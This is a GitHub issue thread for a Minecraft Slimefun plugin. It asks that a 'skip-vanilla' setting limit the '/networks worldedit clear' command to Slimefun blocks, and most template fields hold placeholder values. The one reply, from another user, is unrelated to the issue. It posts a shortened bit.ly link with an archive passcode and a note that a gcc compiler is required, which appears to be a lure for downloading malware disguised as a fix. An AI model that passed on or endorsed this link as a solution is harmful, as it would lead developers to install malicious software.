### ISSUE TITLE
feat: skip-vanilla for clear

### ISSUE THREAD

**Issue by balugaq** [ytdd9527/NetworksExpansion#66]
### 检查项目

- [X] 你使用的是从构建站下载的版本
- [X] 你已经检验过下载的文件的校验和，确认已完整下载文件
- [X] 你没有对下载的文件内容进行任何更改
- [X] 你已经寻找过[已知问题列表](https://github.com/SlimefunGuguProject/Networks/issues)，且没有找到相同的问题

### 问题描述

if skip-vanilla, /networks worldedit clear will serve sf blocks only

### 复现步骤

1

### 预期行为

1

### 服务器日志

1

### 错误报告

1

### 服务端软件

Spigot

### Minecraft 版本

1

### Slimefun版本

1

### 插件版本

1

**Comment by fayaznasrati** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
